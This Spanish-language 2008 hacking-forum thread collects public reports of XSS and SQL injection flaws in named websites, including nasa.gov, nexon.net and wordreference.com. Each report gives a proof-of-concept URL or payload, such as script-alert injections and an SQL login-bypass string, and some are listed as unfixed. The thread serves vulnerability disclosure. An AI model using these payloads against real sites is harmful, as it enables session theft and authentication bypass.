elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
18 Noviembre 2008, 23:49  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 2781 veces)
sirdarckcat
sdc
Moderador Global
*****
Conectado Conectado

Mensajes: 4.877


HAND


Ver Perfil WWW
Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« en: 26 Mayo 2008, 03:50 »

Post para reportar de forma pública una vulnerabilidad de XSS o SQLinjection en un sitio web que no use software distribuido (es decir, que su código no sea accesible).

En caso de que sea software distribuido se puede crear un nuevo tema describiendo la vulnerabilidad.

Solo se permite la publicación de esta información en este tema, y no se puede crear un tema individual reportando este tipo de vulnerabilidades, en caso de hacerlo este será borrado.

El formato es el siguiente (ejemplo):

Sitio web: http://www.google.com/
Descubridor: sirdarckcat
URL del aviso: http://sirdarckcat.blogspot.com/2007/10/vulns-of-google-that-where-and-are-not.html
Fecha de descubrimiento: 27 de Julio del 2007
Fecha de notificación: 27 de Julio del 2007
Fecha de publicación: 13 de Octubre del 2007
Arreglado : Si, desde el 4 de Agosto del 2007
Información adicional:
Código:
http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E


Es importante notar que los siguientes campos son obligatorios:
Sitio web, URL del aviso, Descubridor, Información adicional

Sinembargo Descubridor puede quedar como Anónimo.

Información adicional deberá contener la dirección de enlace al PoC o a una captura de pantalla.

En caso de que sea un enlace este deberá estar entre etiquetas [code][/code].

Además siguiendo con la política de disclosure (ver reglas), solo se aceptarán PoCs que:
Citar
    En los foros públicos, la publicación de vulnerabilidades en sitios Web específicos, esta permitida, si y sólo si: ésta tiene un pagerank igual o superior a 4, fue publicada en otro lugar previamente, y el enlace se mantenga firme con lo estipulado en la sección II.A.2.b. En caso de que la vulnerabilidad sea de un software distribuido, se podrá describir la vulnerabilidad en el foro correspondiente. Sin embargo, en ese caso, esta prohibido colocar sitios Web vulnerables de terceros.
Es decir, URL del aviso debe ser una URL externa al foro, y es obligatoria (a menos que la vulnerabilidad ya haya sido arreglada).

El código bbcode del formato es:

Citar
[b]Sitio web: [/b]
[b]Descubridor: [/b]
[b]URL del aviso: [/b]
[b]Fecha de descubrimiento: [/b]
[b]Fecha de notificación: [/b]
[b]Fecha de publicación: [/b]
[b]Arreglado: [/b]
[b]Información adicional: [/b]
[code][/code]

Fuera de esto, comentarios sobre las vulnerabilidades aqui comentadas deberán estar en otro post.

Esto se deberá hacer "citando" el mensaje en cuestión en un tema nuevo.

Si el comentario es de pertinencia solo al autor del mensaje, este se deberá mandar por MP, y no en un tema nuevo, de lo contrario será borrado sin aviso.

Es todo! Gracias :)

Saludos!!
« Última modificación: 04 Septiembre 2008, 16:09 por sirdarckcat » En línea

Achernar

Desconectado Desconectado

Mensajes: 321



Ver Perfil
Nuevo Mensaje
« Respuesta #1 en: 26 Mayo 2008, 18:56 »

Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso:   http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script
Código:
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0
En línea
Azielito
Moderador Global
*****
Conectado Conectado

Mensajes: 6.922


>.<


Ver Perfil WWW
Nuevo Mensaje
« Respuesta #2 en: 19 Junio 2008, 21:05 »

Sitio web: sonico.com
Descubridor: Azielito
URL del aviso: null
Fecha de descubrimiento: 18/06/08
Fecha de notificación: 18/06/08
Fecha de publicación: 19/06/08
Arreglado: 19/06/08
Información adicional:
tipo: xss
archivo: invitacion.php
vector: r_m
method: get
Código:
<script>alert(/xss/);</script>
« Última modificación: 19 Junio 2008, 21:07 por Azielito » En línea

Azielito
Moderador Global
*****
Conectado Conectado

Mensajes: 6.922


>.<


Ver Perfil WWW
Nuevo Mensaje
« Respuesta #3 en: 19 Junio 2008, 21:13 »

Sitio web: suteym.org.mx
Descubridor: Azielito
URL del aviso: null
Fecha de descubrimiento: 19/05/08
Fecha de notificación: 19/05/08
Fecha de publicación: 19/05/08
Arreglado: 19/05/08
Información adicional:
tipo: SQLi
archivo: informatica.php
vector: clave
method: post
Código:
a') or ('a'='a
En línea

Vengador de las S0mbras

Desconectado Desconectado

Mensajes: 3


ArgeniversoHack


Ver Perfil
Re: Vulnerabilidades de XSS/SQLinjection
« Respuesta #4 en: 31 Julio 2008, 16:57 »

Sitio Web Www.ForoActivo.coM
Descubridor: Vengador de las Sombras
URL de aviso:http://argeniversohack.66ghz.com/index.php/topic,2002.msg4906/topicseen.html#msg4906
Fecha de descubrimiento: 31 de Julio de 2008
Fecha de notificación: --
Fecha de publicación: 31 de Julio de 2008
Tipo: XSS
Información Adicional:

 El archivo vulnerable es el de reportar abusos (/report_abuse.forum), por lo que todos los foros son vulnerables:

Código:
http://[Foro].foroactivo.net/report_abuse.forum?page=%2F%20<script>alert(/Fl4m1ng   0ur sk1llZ/)</script>&report=1
En línea


Eazy

Desconectado Desconectado

Mensajes: 248


Eazy [FM-Team]


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #5 en: 04 Septiembre 2008, 08:20 »

Sitio web: www.top-central.com
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwtop-centralcom.html
Fecha de descubrimiento: 8/7/08
Fecha de notificación: 8/7/08
Fecha de publicación: 04 de Septiembre de 2008
Arreglado: No
Respuesta: Muchas gracias por avisarla, hay creditos en el codigo fuente.
Información adicional:
Código:
"><script>alert(/xss/.source)</script>
« Última modificación: 30 Septiembre 2008, 02:55 por Eazy » En línea

[/url]
Eazy

Desconectado Desconectado

Mensajes: 248


Eazy [FM-Team]


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #6 en: 13 Septiembre 2008, 03:13 »

Sitio web: www.nexon.net
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwnexonnet.html
Fecha de descubrimiento: 12/09/08
Fecha de notificación: 12/09/08
Fecha de publicación: 12/09/08
Arreglado: No
Información adicional:
Código:
"><script>alert(/xss/.source)</script>
En línea

[/url]
s E t H

Desconectado Desconectado

Mensajes: 108


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #7 en: 16 Septiembre 2008, 00:42 »

Sitio web: http://www.wordreference.com
Descubridor: >> s E t H <<
URL del aviso: por e-mail
Fecha de descubrimiento: 2008/7/20
Fecha de notificación: 2008/7/23
Fecha de publicación: 2008/9/15
Arreglado: si
Información adicional: XSS
Respuesta:Thanks for pointing that out!  I'll get it corrected asap.
Código:
http://www.wordreference.com/sinonimos/%3Ch1%3E%3Cs%3Einyectando%20htm%20;)
En línea

¡ENTRA EN MI BLOG O TE JUANKEO!



Citar
1 - 10 de aproximadamente 257.000 de "powered by phpbb" "hacked by". (0,33 segundos)
krackwar(pollito)

Desconectado Desconectado

Mensajes: 876


Los pollos tienen 9 vidas y no pueden ser owneados


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #8 en: 24 Septiembre 2008, 23:19 »


Sitio web: http://Nasa.gov
Descubridor: krackwar
URL del aviso: por e-mail
Fecha de descubrimiento: 23 de Septiembre de 2008
Fecha de notificación: 23 de Septiembre de 2008
Fecha de publicación: 23 de Septiembre de 2008
Arreglado: si
Información adicional: XSS
Respuesta:Ni un solo gracias  >:(
Código:
http://mynasa.nasa.gov/portal/site/mynasa/template.REGISTER/?propID_username=%22%3E%3Ch1%3E%22krackwar%22%3C/h1%3E
En línea

"Por mas que el viento sople el pollo no se reverenciara"
Solo mayores de edad!
Chat Oficial no oficial: http://elhacker.leadhoster.com/chat/

Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.7 | SMF © 2006-2008, Simple Machines LLC